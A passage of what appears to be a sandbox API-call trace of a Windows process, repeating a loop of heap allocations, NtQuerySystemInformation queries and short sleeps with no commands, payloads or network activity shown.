dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0231.077] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0231.077] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0231.077] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0231.077] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0231.077] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0231.078] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0231.078] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0231.078] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0231.078] Sleep (dwMilliseconds=0x110) [0231.147] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0231.147] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0231.148] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0231.148] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0231.148] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0231.149] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0231.152] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0231.152] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0231.154] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0231.154] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0231.154] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0231.155] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0231.155] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0231.156] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0231.156] Sleep (dwMilliseconds=0x110) [0231.197] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0231.197] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0231.198] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0231.198] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0231.198] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0231.198] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0231.199] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0231.199] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0231.199] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0231.199] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0231.199] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0231.212] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0231.213] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0231.214] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0231.214] Sleep (dwMilliseconds=0x110) [0231.223] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0231.223] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0231.224] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0231.224] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0231.224] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0231.225] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0231.225] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0231.225] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0231.226] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0231.226] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0231.226] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0231.227] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0231.227] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0231.228] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0231.228] Sleep (dwMilliseconds=0x110) [0231.311] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0231.311] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0231.311] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0231.312] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0231.312] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0231.312] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0231.312] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0231.312] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0231.313] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0231.313] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0231.313] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0231.313] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0231.313] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0231.314] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0231.314] Sleep (dwMilliseconds=0x110) [0231.451] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0231.451] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0231.452] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0231.454] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0231.454] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0231.454] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0231.454] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0231.454] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0231.455] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0231.455] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0231.455] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0231.455] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0231.455] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0231.456] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0231.456] Sleep (dwMilliseconds=0x110) [0231.580] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0231.580] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0231.581] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0231.581] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0231.581] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0231.582] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0231.582] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0231.582] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0231.582] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0231.582] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0231.582] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0231.583] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0231.583] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0231.583] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0231.583] Sleep (dwMilliseconds=0x110) [0231.838] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0231.838] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0231.839] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0231.839] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0231.839] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0231.840] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0231.840] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0231.840] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0231.841] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0231.842] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0231.842] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0231.843] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0231.843] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0231.845] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0231.845] Sleep (dwMilliseconds=0x110) [0231.888] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0231.888] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0231.889] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0231.889] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0231.889] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0231.889] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0231.889] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0231.889] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0231.890] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0231.890] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0231.890] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0231.891] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0231.891] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0231.891] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0231.891] Sleep (dwMilliseconds=0x110) [0231.951] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0231.951] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0231.952] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0231.952] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0231.952] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0231.952] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0231.953] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0231.953] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0231.953] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0231.953] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0231.953] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0231.953] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0231.953] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0231.954] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0231.954] Sleep (dwMilliseconds=0x110) [0231.993] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0231.993] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0231.994] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0231.994] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0231.994] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0231.995] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0231.995] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0231.995] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0231.995] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0231.995] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0231.995] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0231.996] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0231.996] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0231.996] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0231.996] Sleep (dwMilliseconds=0x110) [0232.031] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0232.031] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.032] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.032] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0232.032] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.032] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.032] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0232.032] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.033] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.033] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0232.033] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0232.033] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.033] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0232.034] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.034] Sleep (dwMilliseconds=0x110) [0232.051] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0232.051] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.052] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.052] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0232.052] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.052] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.052] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0232.052] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.053] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.053] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0232.053] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0232.053] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.054] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0232.054] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.054] Sleep (dwMilliseconds=0x110) [0232.062] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0232.062] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.063] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.063] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0232.063] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.063] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.063] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0232.063] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.064] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.064] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0232.064] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0232.064] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.064] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0232.065] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.065] Sleep (dwMilliseconds=0x110) [0232.079] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0232.079] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.080] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.080] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 